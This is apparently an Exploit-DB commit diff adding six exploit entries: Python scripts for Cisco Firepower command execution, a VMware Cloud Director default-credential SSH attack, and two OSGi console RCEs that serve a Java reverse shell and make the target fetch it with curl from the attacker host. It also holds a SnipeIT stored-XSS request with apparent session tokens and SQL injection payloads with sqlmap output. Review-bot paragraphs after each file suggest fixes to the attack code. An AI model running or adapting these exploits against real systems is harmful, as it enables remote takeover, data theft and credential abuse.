DB: 2024-03-13

8 changes to exploits/shellcodes/ghdb

Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE

VMware Cloud Director 10.5 - Bypass identity verification
OSGi v3.7.2 (and below) Console - RCE
OSGi v3.8-3.18 Console - RCE

SnipeIT 6.2.1 - Stored Cross Site Scripting

Client Details System 1.0 - SQL Injection

Human Resource Management System 1.0 - 'employeeid' SQL Injection
This commit is contained in:
Exploit-DB 2024-03-13 00:16:28 +00:00
parent ce58678266
commit 98f7ce18e2
8 changed files with 785 additions and 0 deletions


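--- a/exploits/hardware/webapps/51881.py
+++ b/exploits/hardware/webapps/51881.py
@@ -0,0 +1,117 @@
+# Exploit Title: [Cisco Firepower Management Center]
+# Google Dork: [non]
+# Date: [12/06/2023]
+# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
+# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]
+# CVE : [CVE-2023-20048]
+import requests
+import json
+# set the variables for the URL, username, and password for the FMC web services interface
+fmc_url = "https://fmc.example.com"
+fmc_user = "admin"
+fmc_pass = "cisco123"
+# create a requests session to handle cookies and certificate verification
+session = requests.Session()
+session.verify = False
+# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token
+token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
+response = session.post(token_url, auth=(fmc_user, fmc_pass))
+# check the response status and extract the access token and refresh token from the response headers
+# set the access token as the authorization header for the subsequent requests
+try:
+if response.status_code == 200:
+access_token = response.headers["X-auth-access-token"]
+refresh_token = response.headers["X-auth-refresh-token"]
+session.headers["Authorization"] = access_token
+else:
+print("Failed to get tokens, status code: " + str(response.status_code))
+exit()
+except Exception as e:
+print(e)
+exit()
+# set the variable for the domain id
+# change this to your domain id
+domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"
+# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC
+devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
+response = session.get(devices_url)
+# check the response status and extract the data as a json object
+try:
+if response.status_code == 200:
+data = response.json()
+else:
+print("Failed to get devices, status code: " + str(response.status_code))
+exit()
+except Exception as e:
+print(e)
+exit()
+# parse the data to get the list of device names and URLs
+devices = []
+for item in data["items"]:
+device_name = item["name"]
+device_url = item["links"]["self"]
+devices.append((device_name, device_url))
+# loop through the list of devices and send a GET request to the URL of each device to get the device details
+for device in devices:
+device_name, device_url = device
+response = session.get(device_url)
+# check the response status and extract the data as a json object
+try:
+if response.status_code == 200:
+data = response.json()
+else:
+print("Failed to get device details, status code: " + str(response.status_code))
+continue
+except Exception as e:
+print(e)
+continue
+# parse the data to get the device type, software version, and configuration URL
+device_type = data["type"]
+device_version = data["metadata"]["softwareVersion"]
+config_url = data["metadata"]["configURL"]
+# check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability
+# use the values from the affected products section in the security advisory
+if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
+print("Device " + device_name + " is vulnerable to CVE-2023-20048")
+# create a list of commands that you want to execute on the device
+commands = ["show version", "show running-config", "show interfaces"]
+device_id = device_url.split("/")[-1]
+# loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device
+# replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute
+for command in commands:
+command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command
+response = session.post(command_url)
+# check the response status and extract the data as a json object
+try:
+if response.status_code == 200:
+data = response.json()
+else:
+print("Failed to execute command, status code: " + str(response.status_code))
+continue
+except Exception as e:
+print(e)
+continue
+# parse the data to get the result of the command execution and print it
+result = data["result"]
+print("Command: " + command)
+print("Result: " + result)
+else:
+print("Device " + device_name + " is not vulnerable to CVE-2023-20048")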
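Review bot: The version gate `if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:` contradicts the entry title's "< 6.6.7.1" — it treats 6.6.7.1 itself as affected and reports every build not in the three-string list as "not vulnerable", so the scan output is unreliable; compare parsed version tuples, e.g. `tuple(int(p) for p in device_version.split(".")) < (6, 6, 7, 1)`, against the fixed release stated in the vendor advisory. `session.verify = False` is unconditional, so the admin credentials on the `generatetoken` call travel over an unverified TLS session; take a CA bundle from the command line (`session.verify = args.ca_bundle`) and read `fmc_url`/`fmc_user`/`fmc_pass` from arguments or environment rather than literals. `import json` and `config_url` are unused, `exit()` should be `sys.exit()`, and the `data["metadata"][...]` lookups raise KeyError on a record without that key, which the `except Exception` wrapped around only the HTTP call does not cover.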


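--- a/exploits/multiple/remote/51882.py
+++ b/exploits/multiple/remote/51882.py
@@ -0,0 +1,75 @@
+# Exploit Title: [VMware Cloud Director | Bypass identity verification]
+# Google Dork: [non]
+# Date: [12/06/2023]
+# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
+# Version: [10.5]
+# CVE : [CVE-2023-34060]
+import requests
+import paramiko
+import subprocess
+import socket
+import argparse
+import threading
+# Define a function to check if a port is open
+def is_port_open(ip, port):
+# Create a socket object
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+# Set the timeout to 1 second
+s.settimeout(1)
+# Try to connect to the port
+try:
+s.connect((ip, port))
+# The port is open
+return True
+except:
+# The port is closed
+return False
+finally:
+# Close the socket
+s.close()
+# Define a function to exploit a vulnerable device
+def exploit_device(ip, port, username, password, command):
+# Create a ssh client object
+client = paramiko.SSHClient()
+# Set the policy to accept any host key
+client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+# Connect to the target using the credentials
+client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
+# Execute the command and get the output
+stdin, stdout, stderr = client.exec_command(command)
+# Print the output
+print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
+# Close the ssh connection
+client.close()
+# Parse the arguments from the user
+parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
+parser.add_argument("ip", help="The target IP address")
+parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
+parser.add_argument("-u", "--username", default="root", help="The username for ssh")
+parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
+parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
+args = parser.parse_args()
+# Loop through the ports and check for the vulnerability
+for port in args.ports:
+# Check if the port is open
+if is_port_open(args.ip, port):
+# The port is open, send a GET request to the port and check the status code
+response = requests.get(f"http://{args.ip}:{port}")
+if response.status_code == 200:
+# The port is open and vulnerable
+print(f"Port {port} is vulnerable to CVE-2023-34060")
+# Create a thread to exploit the device
+thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
+# Start the thread
+thread.start()
+else:
+# The port is open but not vulnerable
+print(f"Port {port} is not vulnerable to CVE-2023-34060")
+else:
+# The port is closed
+print(f"Port {port} is closed")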
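Review bot: `exploit_device` never uses its `username` and `password` parameters — `client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)` hard-codes the literals, so the `-u`/`-w` options parsed below are dead; the call should read `client.connect(ip, port, username, password, allow_agent=False, look_for_keys=False)`. The "vulnerable" verdict is nothing more than an HTTP 200 from any open port, after which the script opens SSH to that same port; 5480 in the default list is presumably not an SSH service, so the check and the action do not describe the same thing and the printed result is misleading. `is_port_open` uses a bare `except:` (it also swallows KeyboardInterrupt), `requests.get` has no `timeout=` and will block on a port that accepts but never answers, `import subprocess` is unused, and the threads started in the loop are never joined.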


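--- a/exploits/multiple/webapps/51878.py
+++ b/exploits/multiple/webapps/51878.py
@@ -0,0 +1,290 @@
+#!/usr/bin/python
+# Exploit Title: [OSGi v3.8-3.18 Console RCE]
+# Date: [2023-07-28]
+# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
+# VisionSpace Technologies GmbH]
+# Exploit Repository:
+# [https://github.com/visionspacetec/offsec-osgi-exploits.git]
+# Vendor Homepage: [https://eclipse.dev/equinox]
+# Software Link: [https://archive.eclipse.org/equinox/]
+# Version: [3.8 - 3.18]
+# Tested on: [Linux kali 6.3.0-kali1-amd64]
+# License: [MIT]
+#
+# Usage:
+# python exploit.py --help
+#
+# Example:
+# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \
+# --lport=4444
+"""
+This is an exploit that allows to open a reverse shell connection from
+the system running OSGi v3.8-3.18 and earlier.
+"""
+import argparse
+import socket
+import sys
+import threading
+from functools import partial
+from http.server import BaseHTTPRequestHandler, HTTPServer
+# Stage 1 of the handshake message
+HANDSHAKE_STAGE_1 = \
+b"\xff\xfd\x01\xff\xfd" \
+b"\x03\xff\xfb\x1f\xff" \
+b"\xfa\x1f\x00\x74\x00" \
+b"\x37\xff\xf0\xff\xfb" \
+b"\x18"
+# Stage 2 of the handshake message
+HANDSHAKE_STAGE_2 = \
+b"\xff\xfa\x18\x00\x58" \
+b"\x54\x45\x52\x4d\x2d" \
+b"\x32\x35\x36\x43\x4f" \
+b"\x4c\x4f\x52\xff\xf0"
+# The buffer of this size is enough to handle the telnet handshake
+BUFFER_SIZE = 2 * 1024
+class HandlerClass(BaseHTTPRequestHandler):
+"""
+This class overrides the BaseHTTPRequestHandler. It provides a specific
+functionality used to deliver a payload to the target host.
+"""
+_lhost: str
+_lport: int
+def __init__(self, lhost, lport, *args, **kwargs):
+self._lhost = lhost
+self._lport = lport
+super().__init__(*args, **kwargs)
+def _set_response(self):
+self.send_response(200)
+self.send_header("Content-type", "text/html")
+self.end_headers()
+def do_GET(self): # pylint: disable=C0103
+"""
+This method is responsible for the playload delivery.
+"""
+print("Delivering the payload...")
+self._set_response()
+self.wfile.write(generate_revshell_payload(
+self._lhost, self._lport).encode('utf-8'))
+raise KeyboardInterrupt
+def log_message(self, format, *args): # pylint: disable=W0622
+"""
+This method redefines a built-in method to suppress
+BaseHTTPRequestHandler log messages.
+"""
+return
+def generate_revshell_payload(lhost, lport):
+"""
+This function generates the Revershe Shell payload that will
+be executed on the target host.
+"""
+payload = \
+"import java.io.IOException;import java.io.InputStream;" \
+"import java.io.OutputStream;import java.net.Socket;" \
+"class RevShell {public static void main(String[] args) " \
+"throws Exception { String host=\"%s\";int port=%d;" \
+"String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \
+"redirectErrorStream(true).start();Socket s=new Socket(host,port);" \
+"InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \
+"si=s.getInputStream();OutputStream po=p.getOutputStream()," \
+"so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \
+">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \
+"while(si.available()>0)po.write(si.read());so.flush();po.flush();" \
+"Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \
+"p.destroy();s.close();}}\n" % (
+lhost, lport)
+return payload
+def run_payload_delivery(lhost, lport):
+"""
+This function is responsible for payload delivery.
+"""
+print("Setting up the HTTP server for payload delivery...")
+handler_class = partial(HandlerClass, lhost, lport)
+server_address = ('', 80)
+httpd = HTTPServer(server_address, handler_class)
+try:
+print("[+] HTTP server is running.")
+httpd.serve_forever()
+except KeyboardInterrupt:
+print("[+] Payload delivered.")
+except Exception as err: # pylint: disable=broad-except
+print("[-] Failed payload delivery!")
+print(err)
+finally:
+httpd.server_close()
+def generate_stage_1(lhost):
+"""
+This function generates the stage 1 of the payload.
+"""
+stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (
+lhost.encode()
+)
+return stage_1
+def generate_stage_2():
+"""
+This function generates the stage 2 of the payload.
+"""
+stage_2 = b"fork \"java ./RevShell.java\"\n"
+return stage_2
+def establish_connection(rhost, rport):
+"""
+This function creates a socket and establishes the connection
+to the target host.
+"""
+print("[*] Connecting to OSGi Console...")
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((rhost, rport))
+print("[+] Connected.")
+return sock
+def process_handshake(sock):
+"""
+This function process the handshake with the target host.
+"""
+print("[*] Processing the handshake...")
+sock.recv(BUFFER_SIZE)
+sock.send(HANDSHAKE_STAGE_1)
+sock.recv(BUFFER_SIZE)
+sock.send(HANDSHAKE_STAGE_2)
+sock.recv(BUFFER_SIZE)
+sock.recv(BUFFER_SIZE)
+def deliver_payload(sock, lhost):
+"""
+This function executes the first stage of the exploitation.
+It triggers the payload delivery mechanism to the target host.
+"""
+stage_1 = generate_stage_1(lhost)
+print("[*] Triggering the payload delivery...")
+sock.send(stage_1)
+sock.recv(BUFFER_SIZE)
+sock.recv(BUFFER_SIZE)
+def execute_payload(sock):
+"""
+This function executes the second stage of the exploitation.
+It sends payload which is responsible for code execution.
+"""
+stage_2 = generate_stage_2()
+print("[*] Executing the payload...")
+sock.send(stage_2)
+sock.recv(BUFFER_SIZE)
+sock.recv(BUFFER_SIZE)
+print("[+] Payload executed.")
+def exploit(args, thread):
+"""
+This function sends the multistaged payload to the tareget host.
+"""
+try:
+sock = establish_connection(args.rhost, args.rport)
+process_handshake(sock)
+deliver_payload(sock, args.lhost)
+# Join the thread running the HTTP server
+# and wait for payload delivery
+thread.join()
+execute_payload(sock)
+sock.close()
+print("[+] Done.")
+except socket.error as err:
+print("[-] Could not connect!")
+print(err)
+sys.exit()
+def parse():
+"""
+This fnction is used to parse and return command-line arguments.
+"""
+parser = argparse.ArgumentParser(
+prog="OSGi-3.8-console-RCE",
+description="This tool will let you open a reverse shell from the "
+"system that is running OSGi with the '-console' "
+"option in versions between 3.8 and 3.18.",
+epilog="Happy Hacking! :)",
+)
+parser.add_argument("--rhost", dest="rhost",
+help="remote host", type=str, required=True)
+parser.add_argument("--rport", dest="rport",
+help="remote port", type=int, required=True)
+parser.add_argument("--lhost", dest="lhost",
+help="local host", type=str, required=False)
+parser.add_argument("--lport", dest="lport",
+help="local port", type=int, required=False)
+parser.add_argument("--version", action="version",
+version="%(prog)s 0.1.0")
+return parser.parse_args()
+def main(args):
+"""
+Main fuction.
+"""
+thread = threading.Thread(
+target=run_payload_delivery, args=(args.lhost, args.lport))
+thread.start()
+exploit(args, thread)
+if __name__ == "__main__":
+main(parse())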
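Review bot: `--lhost` and `--lport` are declared `required=False` in `parse()`, yet `main` passes them unconditionally into `run_payload_delivery` and `exploit`; with them omitted, `generate_stage_1(None)` fails on `lhost.encode()` with an AttributeError that the `except socket.error` in `exploit` does not catch, and `do_GET` would fail on the `%d` format with `lport=None`, leaving the non-daemon server thread running and the process hung. Make both arguments `required=True` (two lines in `parse()`), or call `parser.error(...)` before the server thread is started. `exploit` then does `thread.join()` with no timeout, so if the target never fetches `RevShell.java` the process blocks forever; use `thread.join(timeout=...)` and check `thread.is_alive()` before `execute_payload`. Minor: `sock.send` does not guarantee the whole buffer is written — `sock.sendall` is the right call for the stage messages — and the `recv` calls have no socket timeout; the HTTP server also binds port 80 unconditionally, which needs elevated privileges and is not configurable.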


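--- a/exploits/multiple/webapps/51879.py
+++ b/exploits/multiple/webapps/51879.py
@@ -0,0 +1,144 @@
+#!/usr/bin/python
+# Exploit Title: [OSGi v3.7.2 Console RCE]
+# Date: [2023-07-28]
+# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
+# VisionSpace Technologies GmbH]
+# Exploit Repository:
+# [https://github.com/visionspacetec/offsec-osgi-exploits.git]
+# Vendor Homepage: [https://eclipse.dev/equinox]
+# Software Link: [https://archive.eclipse.org/equinox/]
+# Version: [3.7.2 and before]
+# Tested on: [Linux kali 6.3.0-kali1-amd64]
+# License: [MIT]
+#
+# Usage:
+# python exploit.py --help
+#
+# Examples:
+# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \
+# --lport=4444
+#
+# python exploit.py --rhost=localhost --rport=1337 --payload= \
+# "curl http://192.168.100.100/osgi_test"
+"""
+This is an exploit that allows to open a reverse shell connection from
+the system running OSGi v3.7.2 and earlier.
+"""
+import argparse
+import base64
+import socket
+def parse():
+"""
+This fnction is used to parse and return command-line arguments.
+"""
+parser = argparse.ArgumentParser(
+prog="OSGi-3.7.2-console-RCE",
+description="This tool will let you open a reverse shell from the "
+"system that is running OSGi with the '-console' "
+"option in version 3.7.2 (or before).",
+epilog="Happy Hacking! :)",
+)
+parser.add_argument("--rhost", dest="rhost",
+help="remote host", type=str, required=True)
+parser.add_argument("--rport", dest="rport",
+help="remote port", type=int, required=True)
+parser.add_argument("--lhost", dest="lhost",
+help="local host", type=str, required=False)
+parser.add_argument("--lport", dest="lport",
+help="local port", type=int, required=False)
+parser.add_argument("--payload", dest="custom_payload",
+help="custom payload", type=str, required=False)
+parser.add_argument("--version", action="version",
+version="%(prog)s 0.1.0")
+args = parser.parse_args()
+if args.custom_payload and (args.lhost or args.lport):
+parser.error(
+"either --payload or both --lport and --rport are required.")
+return args
+def generate_payload(lhost, lport, custom_payload):
+"""
+This function generates the whole payload ready for the delivery.
+"""
+payload = ""
+if custom_payload:
+payload = custom_payload
+print("(*) Using custom payload.")
+elif lhost and lport:
+payload = \
+"echo 'import java.io.IOException;import java.io.InputStream;" \
+"import java.io.OutputStream;import java.net.Socket;class Rev" \
+"Shell {public static void main(String[] args) throws Excepti" \
+"on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \
+"s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \
+");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \
+"ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \
+"ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \
+".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \
+"e(pe.available()>0)so.write(pe.read());while(si.available()>" \
+"0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \
+";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \
+");s.close();}}' > RevShell.java ; java ./RevShell.java" % (
+lhost, lport)
+print("(+) Using Java reverse shell payload.")
+bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (
+base64.b64encode(payload.encode()))
+wrapped_payload = b"fork \"%s\"\n" % (bash_payload)
+return wrapped_payload
+def deliver_payload(rhost, rport, payload):
+"""
+This function connects to the target host and delivers the payload.
+It returns True if successful; False otherwise.
+"""
+print("(*) Sending payload...")
+try:
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.connect((rhost, rport))
+sock.send(payload)
+sock.close()
+except socket.error as err:
+print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
+print(err)
+return False
+return True
+def main(args):
+"""
+Main function.
+"""
+payload = generate_payload(args.lhost, args.lport, args.custom_payload)
+success = deliver_payload(args.rhost, args.rport, payload)
+if success:
+print("(+) Done.")
+else:
+print("(-) Finished with errors.")
+if __name__ == "__main__":
+main(parse())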
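Review bot: The argument validation in `parse()` only rejects `--payload` combined with `--lhost`/`--lport`; when none of the three is given it passes, `generate_payload` leaves `payload = ""`, and `deliver_payload` sends an empty wrapped payload while still reporting "(+) Done.". The error text also names `--rport`, which is already `required=True`, where it means `--lhost`. Replace the check with `if bool(args.custom_payload) == bool(args.lhost and args.lport): parser.error("either --payload or both --lhost and --lport are required.")` so that exactly one mode is selected. In `deliver_payload`, `sock.send(payload)` does not guarantee the whole buffer is written; `sock.sendall(payload)` does, and a `settimeout` on the socket would keep a silent target from blocking the run.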


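--- a/exploits/multiple/webapps/51883.txt
+++ b/exploits/multiple/webapps/51883.txt
@@ -0,0 +1,56 @@
+Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting
+Date: 06-Oct-2023
+Exploit Author: Shahzaib Ali Khan
+Vendor Homepage: https://snipeitapp.com
+Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
+Version: 6.2.1
+Tested on: Windows 11 22H2 and Ubuntu 20.04
+CVE: CVE-2023-5452
+Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting
+(XSS) feature that allows attackers to execute JavaScript commands. The
+location endpoint was vulnerable.
+Steps to Reproduce:
+1. Login as a standard user [non-admin] > Asset page > List All
+2. Click to open any asset > Edit Asset
+3. Create new location and add the payload:
+<script>alert(document.cookie)</script>
+4. Now login to any other non-admin or admin > Asset page > List All
+5. Open the same asset of which you can change the location and the payload
+will get executed.
+POC Request:
+POST /api/v1/locations HTTP/1.1
+Host: localhost
+Content-Length: 118
+Accept: */*
+X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://localhost
+Referer: http://localhost/hardware/196/edit
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;
+assetsListingTable.bs.table.cardView=false; laravel_token=
+eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3
+ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM
+d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0
+01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
+XSRF-TOKEN=
+eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH
+FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5
+MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D
+Connection: close
+name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=
+Thanks,
+Shahzaib Ali Khan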
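Review bot: The PoC request carries what appear to be live session and anti-CSRF values — the `X-CSRF-TOKEN` header, the `snipeit_session` cookie and the `laravel_token`/`XSRF-TOKEN` blobs — which add nothing to reproduction and should be replaced with placeholders such as `<redacted>` before publication. The description's "stored cross-site scripting (XSS) feature" should read "vulnerability". The steps say the payload is entered as the new location's name, while the request body sends it in both `name` and `city`; stating which field(s) are rendered unescaped would let a defender scope the fix and detection.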


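--- a/exploits/php/webapps/51877.txt
+++ b/exploits/php/webapps/51877.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Human Resource Management System - SQL Injection
+# Date: 13-01-2024
+# Exploit Author: Srikar ( Exp1o1t9r )
+# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
+# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
+# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
+# Version: 1.0 (Monday, October 10, 2022 - 13:37)
+# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
+# Vulnerable URL and Parameter:URL:
+Parameter: employeeid=2 The following payloads successfully identified SQL injection
+vulnerabilities:
+employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT
+6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT
+(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT
+7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION
+ALL SELECT
+NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
+- *
+# Response:MySQL: 10.4.32-MariaDB
+Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*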
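Review bot: The header `# Vulnerable URL and Parameter:URL:` names no URL, so the script that reads `employeeid` is never identified and the finding can neither be reproduced nor mapped to a fix; add it as `# Vulnerable URL: <path of the page that reads employeeid>`. The payload list is sqlmap output whose line breaks were lost — the random suffixes run straight into the next entry (`NFMgemployeeid=`, `ywfiemployeeid=`, `ninWemployeeid=`) — so one payload per line with its injection type (boolean, error, time, UNION) would make the evidence readable. The `# Response:` line fuses the heading with the DBMS banner; a line break after `Response:` and a note of which payload produced it would complete the record.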


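--- a/exploits/php/webapps/51880.txt
+++ b/exploits/php/webapps/51880.txt
@@ -0,0 +1,72 @@
++ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1
++ **Date:** 2023-26-12
++ **Exploit Author:** Hamdi Sevben
++ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/
++ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip
++ **Version:** 1.0
++ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
++ **CVE:** CVE-2023-7137
+## References:
++ **CVE-2023-7137:** https://vuldb.com/?id.249140
++ https://www.cve.org/CVERecord?id=CVE-2023-7137
++ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137
++ https://nvd.nist.gov/vuln/detail/CVE-2023-7137
+## Description:
+Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.
+## Proof of Concept:
++ Go to the User Login page: "http://localhost/clientdetails/"
++ Fill email and password.
++ Intercept the request via Burp Suite and send to Repeater.
++ Copy and paste the request to a "r.txt" file.
++ Captured Burp request:
+```
+POST /clientdetails/ HTTP/1.1
+Host: localhost
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-us,en;q=0.5
+Cache-Control: no-cache
+Content-Length: 317
+Content-Type: application/x-www-form-urlencoded
+Referer: http://localhost/clientdetails/
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
+uemail=user@mail.com&login=LOG+IN&password=P@ass123
+```
++ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database.
+```
+python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db
+```
+```
+---
+Parameter: uemail (POST)
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123
+Type: error-based
+Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123
+Type: UNION query
+Title: Generic UNION query (NULL) - 7 columns
+Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123
+---
+[14:58:11] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.53, PHP, PHP 8.1.6
+back-end DBMS: MySQL >= 5.0 (MariaDB fork)
+[14:58:11] [INFO] fetching current database
+current database: 'loginsystem'
+```
++ current database: `loginsystem`
+![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)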
